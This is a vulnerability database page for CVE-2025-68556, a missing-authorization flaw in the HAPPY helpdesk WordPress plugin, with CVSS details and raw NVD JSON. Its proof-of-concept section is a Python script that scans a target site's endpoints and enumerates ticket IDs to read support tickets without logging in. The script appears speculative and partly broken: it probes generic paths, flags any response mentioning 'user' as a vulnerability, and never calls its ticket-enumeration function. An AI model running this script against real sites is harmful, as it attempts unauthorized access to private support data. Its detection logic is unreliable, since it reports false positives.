Security Vulnerability Report
中文
CVE-2025-68556 CVSS 5.3 MEDIUM

CVE-2025-68556

Published: 2025-12-23 12:15:46
Last Modified: 2026-04-23 15:36:01

Description

Missing Authorization vulnerability in VillaTheme HAPPY happy-helpdesk-support-ticket-system allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects HAPPY: from n/a through <= 1.0.9.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

VillaTheme HAPPY happy-helpdesk-support-ticket-system <= 1.0.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-68556 PoC - Missing Authorization in happy-helpdesk-support-ticket-system # Target: WordPress site with vulnerable plugin def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-68556 """ # Common WordPress plugin paths endpoints = [ '/wp-json/wp/v2/users', '/?rest_route=/happy/v1/tickets', '/wp-admin/admin-ajax.php', '/wp-content/plugins/happy-helpdesk-support-ticket-system/includes/api.php' ] vulnerable = False for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, timeout=10, verify=False) # Check for unauthorized access to sensitive data if response.status_code == 200: # Look for ticket data, user info, or API responses if 'ticket' in response.text.lower() or 'user' in response.text.lower(): print(f"[+] Potential vulnerability at: {url}") print(f"[+] Response contains sensitive data") print(f"[+] Status Code: {response.status_code}") vulnerable = True # Check for access to admin-only endpoints if response.status_code in [200, 403]: if 'wp-admin' in url and response.status_code == 200: print(f"[!] Possible admin access without authentication: {url}") vulnerable = True except requests.exceptions.RequestException as e: print(f"[-] Error accessing {url}: {e}") return vulnerable def exploit_ticket_enumumeration(target_url): """ Exploit: Enumerate tickets by manipulating ticket IDs """ # Try to access tickets with different IDs for ticket_id in range(1, 100): url = f"{target_url.rstrip('/')}/?rest_route=/happy/v1/ticket/{ticket_id}" try: response = requests.get(url, timeout=10) if response.status_code == 200: print(f"[+] Found ticket ID: {ticket_id}") print(f"[+] Data: {response.text[:200]}") except: pass if __name__ == "__main__": import sys if len(sys.argv) > 1: target = sys.argv[1] print(f"[*] Scanning target: {target}") if check_vulnerability(target): print("[!] Target appears to be vulnerable!") else: print("[-] Target does not appear to be vulnerable") else: print("Usage: python cve-2025-68556.py <target_url>")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68556", "sourceIdentifier": "[email protected]", "published": "2025-12-23T12:15:46.017", "lastModified": "2026-04-23T15:36:00.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in VillaTheme HAPPY happy-helpdesk-support-ticket-system allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects HAPPY: from n/a through <= 1.0.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/happy-helpdesk-support-ticket-system/vulnerability/wordpress-happy-plugin-1-0-9-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}